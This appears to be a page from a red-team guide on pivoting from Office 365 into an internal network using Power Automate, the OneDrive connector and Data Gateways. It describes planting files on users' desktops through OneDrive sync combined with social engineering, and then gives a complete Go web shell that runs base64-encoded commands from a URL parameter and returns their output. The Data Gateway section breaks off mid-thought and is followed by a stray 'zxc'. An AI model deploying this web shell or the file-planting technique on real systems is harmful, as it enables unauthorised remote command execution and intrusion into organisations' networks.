Internal Network

Crossing the boundary from Office 365 to the internal network can be accomplished a couple of different ways with Flow. The next couple of sections cover how this can be accomplished.

One Drive

The One Drive connector allows us to read and write files. In most enterprises the users profile is sync'd between One Drive and there local machine. By having access to One Drive we as attackers can write files directly to a users desktop.

Once the files are in place a bit of social engineering and we have access to the internal network.

Data Gateway

Data Gateway's are fascinating....

zxc

package main

import (
	"encoding/base64"
	"fmt"
	"log"
	"net/http"
	"os/exec"
	"strings"
)

func runCommand(w http.ResponseWriter, r *http.Request) {
	//Get the Parameter
	//expected url is http://url/?cmd=cHdk
	b64cmd := r.URL.Query()["cmd"]
	data := string(b64cmd[0])
	//Decode the b64 string error
	sDec, err := base64.StdEncoding.DecodeString(data)
	if err != nil {
		return
	}
	//stringify, split, and execute the command
	cmd := string(sDec)
	args := strings.Split(cmd, " ")
	cmdOutput, err := exec.Command(args[0], args[1:]...).Output()
	if err != nil {
		//panic("ruh roh")
		return
	}
	//return the output
	fmt.Fprintf(w, string(cmdOutput))
}

//Set listening port, and handle incoming requests
func handleRequests() {
	http.HandleFunc("/", runCommand)
	log.Fatal(http.ListenAndServe(":5000", nil))
}

func main() {
	handleRequests()
}

PreviousPersistence NextSecurity Controls

Last updated 6 years ago

Was this helpful?